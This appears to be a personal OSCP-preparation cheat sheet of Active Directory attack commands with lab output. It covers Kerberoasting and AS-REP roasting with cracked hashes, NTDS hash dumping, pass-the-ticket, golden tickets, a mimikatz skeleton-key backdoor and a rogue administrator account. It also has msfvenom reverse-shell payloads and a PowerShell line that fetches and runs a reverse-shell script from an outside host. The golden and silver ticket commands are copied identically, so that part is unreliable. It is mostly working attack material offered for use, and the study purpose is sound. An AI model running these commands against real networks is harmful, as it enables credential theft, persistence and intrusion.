WIP...
Here we go...
A collection of commands for AD enumeration and exploitation for OSCP preparation.
User Enumeration
Enumerate users for domain
CONTROLLER.local
on DCCONTROLLER.local
kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local /usr/share/wordlists/User.txt
Ticket harvesting and Passwort Bruteforcing
Capture TGTs sent to the KDC every 30 seconds
Rubeus.exe harvest /interval:30
User : CONTROLLER-1$@CONTROLLER.LOCAL
StartTime : 2/7/2022 11:39:25 AM
EndTime : 2/7/2022 9:39:25 PM
RenewTill : 2/14/2022 11:39:25 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
doIFhDCCBYCgAwIBBaEDAgEWooIEeDCCBHRhggRwMIIEbKADAgEFoRIbEENPTlRST0xMRVIuTE9DQUyiJTAjoAMCAQKhHDAaGwZr
...
MTkzOTI1WqgSGxBDT05UUk9MTEVSLkxPQ0FMqSUwI6ADAgECoRwwGhsGa3JidGd0GxBDT05UUk9MTEVSLkxPQ0FM
Password spraying
Rubeus.exe brute /password:Password1 /noticket
Kerberoasting
Kerberoasting allows a user to request a service ticket for any service with a registered SPN.
Tools I can use:
- BloodHound
- kekeo
- Invoke-Kerberoast
- Rubeus
- Impacket
It really is that simple
> Rubeus.exe kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Searching the current domain for Kerberoastable users
[*] Total kerberoastable users : 2
[*] SamAccountName : SQLService
[*] DistinguishedName : CN=SQLService,CN=Users,DC=CONTROLLER,DC=local
[*] ServicePrincipalName : CONTROLLER-1/SQLService.CONTROLLER.local:30111
[*] PwdLastSet : 5/25/2020 10:28:26 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*SQLService$CONTROLLER.local$CONTROLLER-1/SQLService.CONTROLLER.loca
l:30111*$206D1C13CC0B38A9BB6B7673E8BF8CBD$75C2C23607C1DB9C09872722E6915807DD3508
...
E508230C3992BE14AA1ABED9488232E91B26EE5E57648E2A986D983DD1
[*] SamAccountName : HTTPService
[*] DistinguishedName : CN=HTTPService,CN=Users,DC=CONTROLLER,DC=local
[*] ServicePrincipalName : CONTROLLER-1/HTTPService.CONTROLLER.local:30222
[*] PwdLastSet : 5/25/2020 10:39:17 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLER-1/HTTPService.CONTROLLER.lo
cal:30222*$E704E9062B95E26AAE90DDD17AB00AFA$1EC0CB52D58766E91D142824911B86C72D71...
71299289062322C30A52854EA559A45F96CB0DFB1694A6255FFD00A4E4FACD4C1FA7A421BF2371E
7ACB0A385170191F06F194D62D8CD6D906A873985B96467F39ABD3DAF6F9
We can also use Impacket from a remote host to get the hashes
└─$ python2 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.216.129 -request
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
----------------------------------------------- ----------- --------------------------------------------------------------- ------------------- -------------------
CONTROLLER-1/SQLService.CONTROLLER.local:30111 SQLService CN=Group Policy Creator Owners,OU=Groups,DC=CONTROLLER,DC=local 2020-05-25 18:28:26 2020-05-25 18:46:42
CONTROLLER-1/HTTPService.CONTROLLER.local:30222 HTTPService 2020-05-25 18:39:17 2020-05-25 18:40:14
$krb5tgs$23$*HTTPService$CONTROLLER.LOCAL$CONTROLLER-1/HTTPService.CONTROLLER.local~30222*$edbe3a2b24df4573d6821395c197c0cd$c18adfdfa11ca868358b7c136c85941c810a4ef67c029a8893e16ef89b276a3cebbc727b5ec3cfbf2ab53cca38f324a753f1b4fa35a424b34137e76d36f439c696a97404736b0ba75887d62dd39186fba0fab701ca759d657c08f2c2ac0ab0e463d1755bc405716e5ee4a375f41b066bd56d84e54b2a8291786c7c9b3cd5deb1cac6d50d0f1806f130105830c478930cab743af289146f95a91e6873b4886dfa88e4502c2c321d39199f59fa3997d7c7e6cc998da1f8e4ed72214aaeee294c35800127057c8f3b01bcc77e5a461e236d09f7e7d2916239eeca7ae85c999f2135680284de2e8c59c61a8fa26b21783c240dd803d05eb134a1aa0923f8b2a9f15ae71214aa95338a0052754ddae224324f455368a8b90639860a6a2032a7405b6790f37d9c38b5457e5898d4f777a6677d12ad57cc666c18294e10adea825dd039a717dbfa04ffa9dcd7e08d0b4033b5811b7dc789db8df09df3965984cbb0c551716ef670e02393ed52e7cfe27aa285e557c7622d21e47459382f26d22fdab08e3e999fb86c2d05a717db41d44567cba0699c48d995d57290e3b47ccd99f3e87f7af192f54089f14c81be6aadfac74f7c27d67012a6cde1015da932a49c0451409549d2addcad552127713125a822250ecf7b5ed3824ccf9c72ee2a92cd5a2cf6d30e5b0ff5eb8ec1bef820779d0c1c022e3f6f77017440c93c18d5a92bc09618d2030d5906060a7a5aaacb7ae7305069f592037c37cbadd79d47b6ea1ea544845053d8dca191e4a8e0b4787e10cc37d736c08ee6bf50d99d62a108bd092bd7235c93208b75c97ce351239e7d87e782b80732d4b23263e94c3de1006c9dc68f76866c0110710778f485ea85a476759d209cb36b0019a8489e47e627dc23892fd459a3b8a1c5986cfa457911b0974254e62f006e6e6c9060b815b23c5b99b69c62dd7649e87393c1fca42a5bea022ca23dbe1d9e6ee5f05d70366116a226b50729da585189cb0bfa3740fd485e3613f43321b70db07e3763e62a419f0e3aa5cfaac2637c7528ff293609b45d7aaa5f21ae43f0d007bcb44bbb2e6f9125ee97b9447b46838316de16dd82b398f1db1114ad0c3fb70fcb85394e365e69c22a37dd464581ca3a0768b10b24030f5db04fd248465565ed733d595857376326335e3c4b8bf00f47301252081d6cae1d25c588e62b5b67c3465e6a955ee8fdee15053ce4aafea986fcba21e25dba5b885704774a89886238317324367b6dab03eb338254b1a370c7199f8335a893c5db5003a2ee9ecdb162b73cf0937a00ac2c456bab4107e3bd3aa32e30d11e5577d349bb0e5b3f9e066b41b33bc5ac2f1b80899a5e99b2e3393f7f902bd704c69477f4c54fb983
$krb5tgs$23$*SQLService$CONTROLLER.LOCAL$CONTROLLER-1/SQLService.CONTROLLER.local~30111*$7c05198e5d3dbd2432103de303460084$202eb9c02b94046031d53ca4fde75d47ace3c77602d93c6b04c10a3e58c4ee7a1352d91fac43a2164eb8be0cc23b16d88355e73f8712536cc4d1087cb02bcf1cc3aa24410b0f9ee48f53c828f2323fadebeffc4f1251967983a490ec5d21a01643659e278b559041144796010fa5faf969c15864e9e495062bf9e91661a69127c0f932102bae89e1520cb815717be27668948afd2bf83eb156868952c88225742827cbfc9fbaabb2bdaa4507fc990e6e97a2463525209aafe000a2c8087b03aef296400c0e88505f2ee51a051deca47ee46729ca20c9d13f9f5ebb35185b2bea207f30c226d473f80e4392d136242e16bd85a82c804625f433f011ba0ec5bd1dca19a18da1e8af99d1735fa02972afcc9825b3870b7101e060d31305bc56a6cb2a2f479ef5181ec0caab549ec82ea9d0bee9a7b8e957b9534123edaabdd64125ff1193896b947f5415eef59e2762b3d78d56d3885f94f7385ef0d617e799dc93f07f83dc3e7821a79702106757b9f33f384609f51e51e9f096831256b4eba1fe62916b3b4a4d638e10ba14c793036effb0ea25410c992026c901006c17742be7bc986a7ecbe6d88550621a772909e8c20a82add57ce42e9de3408569d4d4d3ef1f4f71a38c2e4770fcbf8cb65fbdfa4d49ad94a72e4c59e8ba7b361940f93803801e534448c475d7630ee1e4f9a14e24fea65cb4babb42be31294d4cb6deb557e76a64108a08013c3aeb3a19b8e2b477d0f47df8cf3ae74740bc47208d5c91da947771a6d7d1db7f99be2716f8bf6e54416441936ae58b32347c6fca1e91f0d6b317c92e146166f94ee7bca887077a435e883845a7d29a0740ec3ae2d8594cf387f1db990d28db1c472d9ceb114ae8e948972aa04a3891ae9567aff4e3efec1c6a1bd46932b705517ae40cfeb25ff23288f6636b4403fb1f34fee8c008c32fcdc4934035d9da73932bf60c7aacd07b9b450daacf96b2cc010b7bdfd132646a52c6e68b43a29914ea4f6be9a2a159334e1fcb09ae4ffc910e918b121c9336621cad24abb49e43275f2f10b2936f76960650fd3269a3053a802e76a19dab67c3dc34937b003b38808b5a9509a0e1403ea0f43b0e0421754a58f657593e30ad990c506d82ced50f112c55ad696c54d41249beb66050af783818317e26b9f5228b62cb25e43a564b68acb060c63ae9c0f67921069983f5ca7f06ac85905c414b279f73293f21fd8a26c6be3107813eeac51ec61d30fd974361ef321103ac0d898924a063f8222ebf37d88b2ec74019489a2b37ab18f82e3fac909dd4841b7e4118181afc0d2def0bc953b72ffcc62bd79f3a4d574378df5f1e49683cdcf03d23909200044e1edd42af76bce4eb1bcf73f80204
Now crack the hash
└─$ hashcat -m 13100 -a 0 http_service.hash Pass.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-10510U CPU @ 1.80GHz, 5836/5900 MB (2048 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 134 MB
Dictionary cache built:
* Filename..: Pass.txt
* Passwords.: 1240
* Bytes.....: 9706
* Keyspace..: 1240
* Runtime...: 0 secs
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
$krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLER-1/HTTPService.CONTROLLER.local:30222*$e704e9062b95e26aae90ddd17ab00afa$1ec0cb52d58766e91d142824911b86c72d71d94b7ee79eaff3a948822751a92af00b112372518ab77d5e1a3d4b618d428942bce1fd18d0f7f75ee64d7b2c9e0b8b52643bf9d94cd1b02512c1a403eabb70d9525c1567d830c4d2ff756f4eaeda30b5f5156ec619a4dfb279ead114d959b0de3f9893025676d8665ccf24bc0656ace0eb5d97fc79169c9e92780fa4918af51142550146eb9eeeb7d970e74366a30c95ad6533d45d0a4679199f2e322ae98b91fee0034c8bb28ed44e8f9dc59ea058181861692bb36e2ed1f063fae8192e3a7e7ce8a304dc6c0662fdb52f735f204222c33dff96bd4daec3ae364de12e07c58d429813b7c7e235f966844e7f3dfe256c37e82c19e01fbee83b4fbaf6b67f38887fc30376b08c5381d0f33fa5ee5db3ac6a440d15fa7e63a6c403dc2673f08ae0d6d9f0b2c07c5905f5455db72f2f9ee7e6d1a9c30a5edc1ca6de3ffed1e54972ab1ac9c679c9f7acbe715e0a6dc02f298950c8b81b8e75a5ac673b0eec7dd0dd52aa397f5e08dc0efde675d66cf1414b1a2fb6379742ab6b50409f446ed3bdc07c6a1004faa426dff55aa562b43f38e7a22f403e57bd68b7418aea0409df4a19d300d2ff12a7bcfcf12f29243a74b62187b6a173bb022ffeaa0198dae5644132d52e571aa607b6c6705b955505089cbe5f8033e1b386a13fc9722af35f542803e96663febd417e90f5c69af8ce31007c9c42bb46b8b0cfc0749e37dea753cbfd6e70d82dc9eb47bdb9941c0a8ff26f8c6f11bc41fee8aee60e6816e4293142e93adfac780ef53e22980ba49f90a3ad0a6b639c63ba6e7f314db9aac6b58e9b593f2c4794ef448a25b42e377a2bed8c8fae55efb1607448f948697d34e64e19ebc3bb43ac52ae70b0990f4485bfee6ca92ebcf55322f8f896160b0a7dca3b65296aee8686bd6fe480a5beb08fb235222837b27c4706e398a76da42cdd89f3ef097376eb19d6332914031818490f8c84850bd21a0e7bfb6eab2ca2a49ee56298f489bffa170aa3420d78b5571bd14a2de51056773ba268f2e70ba5ced238d829386df1811d65c901e340f395cc28adbb23e1e569931dadb41ec46856a4ec2974f7ee1d48b887982926ac8be2ad3face7720d1fd6e59392e7e1e6aa2492514a8e2c73a23a62092740a0753588cc0fe06340a02711fe49c0b51475fa4179022605d5dfb65da9d326052e47bb8960db792da01d6f72541227a0a75396ff11c22d40cf43b532d31559a1d4fe9c7e8c81bb7e967b7328977d76d5314a83cc469f3b201b0dadd18155a4965e63f6b44ead8ff380b730401e2bfbe88a8f2c7e8bd85511908bf496ba181c233486a7aee2f2229b4661b616f419c1fe3cd42946c2a457e89c49f45540dac819a06b3556dd7a56a3cb1b253e427029fcfaa3873dbe5df3af4319277625c4928f136562ee36b139e11ede4946b84ac0c8b35c2c5a515700d4e5917df212983a334a5ac08ce5382ee6aa3f21ed0663635a413f90f32ad0122b947fcdc4b43e1a6d5045b93c5918eb87897db2ae924ecf2e7cb71299289062322c30a52854ea559a45f96cb0dfb1694a6255ffd00a4e4facd4c1fa7a421bf2371e7acb0a385170191f06f194d62d8cd6d906a873985b96467f39abd3daf6f9:Summer2020
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLE...daf6f9
Time.Started.....: Mon Feb 7 15:34:26 2022 (0 secs)
Time.Estimated...: Mon Feb 7 15:34:26 2022 (0 secs)
Guess.Base.......: File (Pass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 236.6 kH/s (1.28ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 1240/1240 (100.00%)
Rejected.........: 0/1240 (0.00%)
Restore.Point....: 0/1240 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> hello123
AS-REP Roasting
Similar to Kerberoasing, AS-REP Roasting dumps the krbasrep5
hash of user accounts that have Kerberos pre-auth disabled which means those users don't need to be service accounts.
Rubeus.exe asreproast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: AS-REP roasting
[*] Target Domain : CONTROLLER.local
[*] Searching path 'LDAP://CONTROLLER-1.CONTROLLER.local/DC=CONTROLLER,DC=local' for AS-REP roastable users
[*] SamAccountName : Admin2
[*] DistinguishedName : CN=Admin-2,CN=Users,DC=CONTROLLER,DC=local
[*] Using domain controller: CONTROLLER-1.CONTROLLER.local (fe80::e05e:1173:33f7:7c9%5)
[*] Building AS-REQ (w/o preauth) for: 'CONTROLLER.local\Admin2'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$Admin2@CONTROLLER.local:3C51D07F1843F12D66E4BBB233C09CE3$795884C015C4
574540500F23BF6F07D4962505A2DFC15F45E3F9FDE5596024E9C5E92D0B089581817FAFD6B7F479
3AE38258DDACFBB373D26227229F9F1EC3885855FA5A7C57180C385281A565D6F245CF02E9B48CE9
2428147580353F9E337F0002F6C7D86FA054F6E5F4FE1022EF897F1CCEE8FB118D7AFCE5D83AB816
3CC4CC1A66918FC402ECE66233CCDD33FA646FC333248CABC280F9FF83EA0CFBA36FE93681C3B8B8
5CF8069493053A6216CD5A2EFCD1A60328CA8B5CAE00264FB6D561CDA1535C6BD68B293E5E6FD4C4
F22708D78352E1DA494134A28F600D9354C97B1DC1341B50344E05D53D1811BB3B9A4A7EA62D
[*] SamAccountName : User3
[*] DistinguishedName : CN=User-3,CN=Users,DC=CONTROLLER,DC=local
[*] Using domain controller: CONTROLLER-1.CONTROLLER.local (fe80::e05e:1173:33f7:7c9%5)
[*] Building AS-REQ (w/o preauth) for: 'CONTROLLER.local\User3'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$User3@CONTROLLER.local:CA336057CAD77194863CD97401A4B06A$328EC569B6006
B60093AD9B47EC31AAAAF5725DADFF587AC393521389AEC08A695B92824B9975312931292D58F68C
C18E1A81B883B0B4CFCE5A68CFF24D7772B183F893CA763A7644D5D26A1475C7EAA2E443CADBE727
D98B4075A0E44805B55AAF6A23E78821B38F9DB831CF14D636EAD35C0139965A4819A2723C375EA9
DDBF4ADE7DA54DE4F176F49981938EF496A55F83DEFEEC30B6BB72F70F0720F8E92D8A8A9E0F5D3E
27306C9D6309AAA8FCA49B1D6ED714FEC746A4AA6EF53DC364C5491405F469DF288FE038AE8EB0E3
D8BB5A6DB13822F4ACDFC7F65D43F9DE8AFB693CA19CB747AEF92BFDF8451E80826669FFCC3
IMPORTANT Insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User..... to crack the hash
Then crack the hash using hashcat -m 18200 hash.txt Pass.txt
Also we can achieve the same with impacket.
python3 impacket/examples/GetNPUsers.py spookysec.local/svc-admin -dc-ip 10.10.253.53
Dump Password hashes
└─$ python3 impacket/examples/secretsdump.py backup:backup2517860@spookysec.local
Impacket v0.9.25.dev1+20220331.224942.eb283663 - Copyright 2021 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
Pass the ticket
For this attack we'll be using Mimikatz which allows us to dump the TGT from LSASS memory.
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
If this commands returns '20' OK it does not that means you do not have the administrator privileges to properly run mimikatz
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::tickets /export
Authentication Id : 0 ; 1202421 (00000000:001258f5)
Session : NetworkCleartext from 0
User Name : Administrator
Domain : CONTROLLER
Logon Server : CONTROLLER-1
Logon Time : 2/8/2022 8:38:42 AM
SID : S-1-5-21-432953485-3795405108-1502158860-500
* Username : Administrator
* Domain : CONTROLLER.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 2/8/2022 8:38:42 AM ; 2/8/2022 6:38:42 PM ; 2/15/2022 8:38:42 AM
Service Name (02) : krbtgt ; CONTROLLER.LOCAL ; @ CONTROLLER.LOCAL
Target Name (02) : krbtgt ; CONTROLLER.LOCAL ; @ CONTROLLER.LOCAL
Client Name (01) : Administrator ; @ CONTROLLER.LOCAL ( CONTROLLER.LOCAL )
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
5a88b21f145c0e23bc1a9b3ea3506d987cff9a338de6360de24dc6112a85b49e
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;1258f5]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi !
This will dump all the capured .kirbi tickets to the current directory
02/08/2022 09:12 AM <DIR> .
02/08/2022 09:12 AM <DIR> ..
05/25/2020 02:45 PM 1,263,880 mimikatz.exe
05/25/2020 02:14 PM 212,480 Rubeus.exe
02/08/2022 09:12 AM 1,595 [0;1258f5]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022 09:12 AM 1,787 [0;18e8aa]-1-0-40a50000-CONTROLLER-1$@GC-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,587 [0;27833a]-2-0-60a10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022 09:12 AM 1,755 [0;36502]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,587 [0;3691f]-2-0-60a10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022 09:12 AM 1,791 [0;3e4]-0-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,587 [0;3e4]-2-0-40e10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022 09:12 AM 1,755 [0;3e7]-0-0-40a50000-CONTROLLER-1$@HTTP-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,787 [0;3e7]-0-1-40a50000-CONTROLLER-1$@GC-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,721 [0;3e7]-0-2-40a50000-CONTROLLER-1$@cifs-CONTROLLER-1.kirbi
02/08/2022 09:12 AM 1,711 [0;3e7]-0-3-40a50000.kirbi
02/08/2022 09:12 AM 1,791 [0;3e7]-0-4-40a50000-CONTROLLER-1$@cifs-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,791 [0;3e7]-0-5-40a50000-CONTROLLER-1$@LDAP-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,721 [0;3e7]-0-6-40a50000-CONTROLLER-1$@LDAP-CONTROLLER-1.kirbi
02/08/2022 09:12 AM 1,755 [0;3e7]-0-7-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,647 [0;3e7]-1-0-00a50000.kirbi
02/08/2022 09:12 AM 1,587 [0;3e7]-2-0-60a10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022 09:12 AM 1,587 [0;3e7]-2-1-40e10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022 09:12 AM 1,755 [0;5646d]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,755 [0;564c9]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,791 [0;56505]-1-0-40a50000-CONTROLLER-1$@LDAP-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,755 [0;5653e]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
With those we can pass the hash
and impersonate the admin
mimikatz # kerberos::ptt [0;1258f5]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi
* File: '[0;1258f5]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi': OK
To verify we can use klist
klist
Current LogonId is 0:0x1258f5
Cached Tickets: (1)
#0> Client: Administrator @ CONTROLLER.LOCAL
Server: krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 2/8/2022 8:38:42 (local)
End Time: 2/8/2022 18:38:42 (local)
Renew Time: 2/15/2022 8:38:42 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
Golden Ticket/Silver Ticket Attacks
When staying undetected, getting a silver ticket is the better option instead of getting a golden ticket. This is because a silver ticket is limited to the service that is targeted whereas a golden ticket has access to any Kerberos service.
Dumping the krbtgt
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CONTROLLER / S-1-5-21-432953485-3795405108-1502158860
RID : 000001f6 (502)
User : krbtgt
* Primary
NTLM : 72cd714611b64cd4d5550cd2759db3f6
LM :
Hash NTLM: 72cd714611b64cd4d5550cd2759db3f6
ntlm- 0: 72cd714611b64cd4d5550cd2759db3f6
lm - 0: aec7e106ddd23b3928f7b530f60df4b6
Creating a golden/silver ticket
Golden Ticket
mimikatz # Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:d01d6ccf97a2ee214ec7185173a3b659 /id:1103
Silver Ticket
mimikatz # Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:d01d6ccf97a2ee214ec7185173a3b659 /id:1103
We can now open an elevated command prompt `misc::cmd
Backdooring Kerberos
We can implant a mimikatz skeleton and abuse the way AS-REQ works while using RC4 ciphers
The default hash for a mimikatz skeleton key is 60BA4FCADC466C7A033C178194C03DF6 which makes the password -"mimikatz"
misc::skeleton
That's it... That's how you backdoor a Microsoft authentication service. I know it's RC4 but still! This is amazing!!!!
Now we can view network shares using
net use c:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
SMB
Enumerate with nmap
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.232.66
List share files
smbclient //10.10.232.66/anonymous
Recursively download files
smbget -R smb://<ip>/anonymous
Privesc
Unquoted service path
Download
certutil.exe -urlcache -split -f http://10.8.49.147:1337/PowerUp.ps1 PowerUp.ps1
Load and execute
PS C:\tmp> . .\PowerUp.ps1
PS C:\tmp> Invoke-AllChecks
Microsoft splits the path with a space and appends ".exe" after every split. Generate a reverse shell with the name of the next folder
c:\users\admin\my service\bin\start.exe
c:\users\admin\my\service.exe
Restart service
net stop servicename
net start servicename
token imprtsonation
There are two types of access tokens:
primary access tokens: those associated with a user account that are generated on log on
impersonation tokens: these allow a particular process(or thread in a process) to gain access to resources using the token of another (user/client) process
For an impersonation token, there are different levels:
SecurityAnonymous: current user/client cannot impersonate another user/client
SecurityIdentification: current user/client can get the identity and privileges of a client, but cannot impersonate the client
SecurityImpersonation: current user/client can impersonate the client's security context on the local system
SecurityDelegation: current user/client can impersonate the client's security context on a remote system
where the security context is a data structure that contains users' relevant security information.
The privileges of an account(which are either given to the account when created or inherited from a group) allow a user to carry out particular actions.
Here are the most commonly abused privileges:
SeImpersonatePrivilege
SeAssignPrimaryPrivilege
SeTcbPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
View privileges
whoami /priv
Impersonation with Invoke-TokenManipulation.ps1
. .\Invoke-TokenManipulation.ps1
PS C:\Program Files (x86)\Jenkins> Invoke-TokenManipulation -Enumerate
Incognito also looks nice
PS C:\Program Files (x86)\Jenkins> cmd.exe /c "incognito.exe list_tokens -g"
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Listing unique users found
PS C:\Program Files (x86)\Jenkins> cmd.exe /c "incognito.exe add_user xnull password"
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user xnull to host 127.0.0.1
[+] Successfully added user
PS C:\Program Files (x86)\Jenkins> cmd.exe /c "incognito.exe add_localgroup_user Administrators xnull"
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user xnull to local group Administrators on host 127.0.0.1
[+] Successfully added user to local group
PS C:\Program Files (x86)\Jenkins> net user xnull
User name xnull
Full Name xnull
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/14/2022 9:54:21 PM
Password expires 3/28/2022 9:54:21 PM
Password changeable 2/14/2022 9:54:21 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
Then RDP into it
rdesktop -u xnull -p password 10.10.175.25
Reverse Shell
Exe using msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1338 -f exe -o Advanced.exe
or
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.8.49.147 LPORT=1339 -f exe -o shell.exe
Powershell using PowerShellTcp
powershell iex (New-Object Net.WebClient).DownloadString('http://10.8.49.147:1338/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.8.49.147 -Port 1337
More exploitation
Can we spoof a printer?
PrintSpoofer
c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer64.exe -i -c cmd
PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
